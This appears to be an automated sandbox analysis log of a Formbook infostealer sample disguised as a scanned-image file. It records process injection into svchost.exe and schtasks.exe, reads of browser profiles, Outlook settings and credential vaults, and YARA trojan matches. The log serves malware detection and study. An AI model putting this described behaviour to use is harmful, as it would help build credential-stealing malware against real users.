            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7FB769_2_02F7FB76
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC38E09_2_02EC38E0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F2D8009_2_02F2D800
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC99509_2_02EC9950
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EDB9509_2_02EDB950
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F559109_2_02F55910
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC9EB09_2_02EC9EB0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02E83FD29_2_02E83FD2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02E83FD59_2_02E83FD5
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7FFB19_2_02F7FFB1
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC1F929_2_02EC1F92
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7FF099_2_02F7FF09
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F7FCF29_2_02F7FCF2
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F39C329_2_02F39C32
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EDFDC09_2_02EDFDC0
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F77D739_2_02F77D73
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02EC3D409_2_02EC3D40
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02F71D5A9_2_02F71D5A
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026C16509_2_026C1650
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026DA0809_2_026DA080
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026BCA809_2_026BCA80
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026BAB009_2_026BAB00
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026BC8609_2_026BC860
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026BC8589_2_026BC858
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026C316B9_2_026C316B
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026C31709_2_026C3170
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02CBA2E39_2_02CBA2E3
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02CBB0289_2_02CBB028
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02CBBB049_2_02CBBB04
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02CBBFBC9_2_02CBBFBC
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_02CBBC249_2_02CBBC24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02D75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02DBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02D2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02D87E54 appears 110 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02DAEA12 appears 86 times
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: String function: 00A27F41 appears 35 times
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: String function: 00A40D27 appears 70 times
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: String function: 00A48B40 appears 42 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02F07E54 appears 110 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02F2EA12 appears 86 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02EF5130 appears 58 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02EAB970 appears 280 times
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: String function: 02F3F290 appears 105 times
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1330139056.00000000041FD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1333185722.00000000040A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.2120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.2120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@15/10
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8A2D5 GetLastError,FormatMessageW,0_2_00A8A2D5
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A78713 AdjustTokenPrivileges,CloseHandle,0_2_00A78713
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A78CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00A78CC3
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00A8B59E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A9F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00A9F121
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A986D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00A986D0
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A24FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00A24FE9
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeFile created: C:\Users\user\AppData\Local\Temp\autB42C.tmpJump to behavior
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: schtasks.exe, 00000009.00000002.3801096520.0000000002965000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3801096520.0000000002971000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1805384026.0000000002965000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3801096520.0000000002995000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeReversingLabs: Detection: 76%
            Source: unknownProcess created: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"Jump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic file information: File size 1211904 > 1048576
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000002.00000003.1592887920.0000000002649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592887920.000000000261A000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XraVxjqYYo.exe, 00000008.00000000.1545991574.000000000046E000.00000002.00000001.01000000.00000005.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3798030876.000000000046E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1333185722.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1334363237.0000000004120000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1625220837.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1530797185.0000000002900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1625220837.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532825670.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3810622511.000000000301E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1627214817.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3810622511.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1625049218.0000000002B16000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1333185722.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1334363237.0000000004120000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1625220837.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1530797185.0000000002900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1625220837.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532825670.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000009.00000002.3810622511.000000000301E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1627214817.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3810622511.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1625049218.0000000002B16000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000009.00000002.3811492832.00000000034AC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000009.00000002.3801096520.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696350380.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1913594135.0000000023C5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000002.00000003.1592887920.0000000002649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592887920.000000000261A000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000009.00000002.3811492832.00000000034AC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000009.00000002.3801096520.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696350380.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1913594135.0000000023C5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A9C304 LoadLibraryA,GetProcAddress,0_2_00A9C304
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A48B85 push ecx; ret 0_2_00A48B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02132210 push ecx; iretd 2_2_0213222E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0213E2B4 push ss; ret 2_2_0213E2C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0213E36A push edx; iretd 2_2_0213E372
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0212209E push esp; ret 2_2_021220A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021250AF push 660EA6FEh; ret 2_2_021250B4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021321DC push ebp; retf 2_2_021321F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021321DC push ecx; iretd 2_2_0213222E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021219E0 push esp; ret 2_2_02121A04
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02123660 push eax; ret 2_2_02123662
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021276F8 push edi; retf 2_2_0212771F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0212D48B pushfd ; ret 2_2_0212D48F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02139D8E push ss; ret 2_2_02139D8F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0213A5AB push ss; retf 2_2_0213A645
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0213E5F3 push D1A60662h; ret 2_2_0213E5F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_021345F7 push eax; iretd 2_2_02134687
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D0225F pushad ; ret 2_2_02D027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D027FA pushad ; ret 2_2_02D027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D0283D push eax; iretd 2_2_02D02858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D309AD push ecx; mov dword ptr [esp], ecx2_2_02D309B6
